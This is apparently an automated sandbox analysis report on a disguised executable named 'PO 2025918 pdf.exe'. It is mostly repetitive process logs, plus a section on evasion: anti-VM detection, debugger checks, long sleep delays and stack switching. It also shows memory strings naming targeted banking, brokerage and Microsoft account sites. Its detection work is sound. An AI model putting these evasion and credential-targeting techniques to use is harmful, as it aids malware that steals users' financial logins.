                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: PO 2025918 pdf.exe PID: 6468, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88ED324
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88ED944
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88ED504
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88ED544
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88F0154
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: 1A00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: 9330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: A330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: A530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeMemory allocated: B530000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E rdtsc 5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6039Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 960Jump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeAPI coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\ROUTE.EXEAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exe TID: 4688Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 2408Thread sleep count: 40 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 2408Thread sleep time: -80000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe TID: 412Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\KdnZCeaEHLctVxMuOVLaoRpXKNjWFHsqPblwyqILABoYlgEkyRguIebxItwraFU\mIrIhAjAJblou.exe TID: 412Thread sleep time: -33000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\ROUTE.EXELast function: Thread delayed
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 8_2_0283C600 FindFirstFileW,FindNextFileW,FindClose,8_2_0283C600
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: -4108694.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: -4108694.8.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: -4108694.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: global block list test formVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2195111905.00000000013C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: -4108694.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: -4108694.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: -4108694.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: -4108694.8.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: -4108694.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: ROUTE.EXE, 00000008.00000002.3896051765.0000000002BAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: -4108694.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: -4108694.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: -4108694.8.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: mIrIhAjAJblou.exe, 0000000A.00000002.3896363880.000000000144F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
                      Source: -4108694.8.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: PO 2025918 pdf.exe, 00000000.00000002.2195111905.00000000013C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: -4108694.8.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: -4108694.8.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: -4108694.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: -4108694.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: -4108694.8.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: -4108694.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: firefox.exe, 0000000B.00000002.2750210976.000001C3D5DCC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbb
                      Source: -4108694.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\ROUTE.EXEProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016D096E rdtsc 5_2_016D096E
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_00417A63 LdrLoadDll,5_2_00417A63
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01728158 mov eax, dword ptr fs:[00000030h]5_2_01728158
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01724144 mov eax, dword ptr fs:[00000030h]5_2_01724144
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01724144 mov eax, dword ptr fs:[00000030h]5_2_01724144
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01724144 mov ecx, dword ptr fs:[00000030h]5_2_01724144
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01724144 mov eax, dword ptr fs:[00000030h]5_2_01724144
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01724144 mov eax, dword ptr fs:[00000030h]5_2_01724144
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696154 mov eax, dword ptr fs:[00000030h]5_2_01696154
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01696154 mov eax, dword ptr fs:[00000030h]5_2_01696154
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0168C156 mov eax, dword ptr fs:[00000030h]5_2_0168C156
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C0124 mov eax, dword ptr fs:[00000030h]5_2_016C0124
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_01750115 mov eax, dword ptr fs:[00000030h]5_2_01750115
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173A118 mov ecx, dword ptr fs:[00000030h]5_2_0173A118
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173A118 mov eax, dword ptr fs:[00000030h]5_2_0173A118
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173A118 mov eax, dword ptr fs:[00000030h]5_2_0173A118
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0173A118 mov eax, dword ptr fs:[00000030h]5_2_0173A118
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_017661E5 mov eax, dword ptr fs:[00000030h]5_2_017661E5
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_016C01F8 mov eax, dword ptr fs:[00000030h]5_2_016C01F8
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E1D0 mov eax, dword ptr fs:[00000030h]5_2_0170E1D0
                      Source: C:\Users\user\Desktop\PO 2025918 pdf.exeCode function: 5_2_0170E1D0 mov eax, dword ptr fs:[00000030h]5_2_0170E1D0
